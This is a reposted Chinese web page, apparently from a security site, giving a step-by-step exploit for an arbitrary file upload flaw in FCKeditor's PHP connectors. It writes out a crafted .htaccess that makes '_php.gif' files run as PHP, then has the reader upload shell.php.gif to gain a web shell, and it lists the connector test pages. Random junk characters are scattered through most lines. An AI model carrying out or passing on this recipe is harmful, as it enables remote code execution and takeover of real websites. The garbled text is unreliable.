FCKeditor所有php版本Upload上传漏洞# k# l- F" q; ^) A
作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
' t) V( o* p2 A( J' j减小字体 增大字体
5 `* ]$ K2 p- i9 E- I+ O[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability* Y) y) Y0 K! I2 u j5 X+ B2 a
[+] Date: 2011& o! d5 U9 z& O( e' Q5 X3 w
[+] Author : sinesafe.cn/ N6 Y+ s- S3 e9 T; z& F5 F
[+] Website : WwW.sinesafe.cn. m2 s* ^5 b# \ \# J5 O
———————————————————) z6 i8 Q* c' S
1.create a htaccess file:
* D4 F! r" G6 {$ Scode:
& h% h/ x m: n2 ^8 y& R<FilesMatch “_php.gif”>
3 m; v0 {+ S( T: X# YSetHandler application/x-httpd-php+ B( n$ U) f q% t# G8 _
</FilesMatch>
0 c1 k# b* n) w% x
- G. ?- P) M! S+ e4 \2.Now upload this htaccess with FCKeditor.
" Q5 `7 s; y4 _9 a; |2 r6 W
3 C3 x* \ g: K3 N) ghttp://www.sinesafe.cn/FCKeditor ... er/upload/test.html( H1 k$ e7 m4 S) n) u1 {
& D6 Z% F1 c5 ~3 \9 V
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html/ X# c/ Y& m& N
* C0 N* E0 K5 z* |7 C
———————————————————————————————-+ Y* m8 p% W* e5 \) B7 C3 U
3.Now upload shell.php.gif with FCKeditor., [4 v& d; L+ L9 `
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.- _+ f# i9 c& f
5.http://www.sinesafe.cn/anything/shell_php.gif
, r) N6 p1 {& A. N: k; y/ N; D2 V6.Now shell is available from server. |
- }- k, u6 f3 u
' _- p0 [& T8 Q3 s U, f0 F8 }8 w4 t; w: l2 W x
|
发表于 2013-10-27 17:25:21
收藏
支持
反对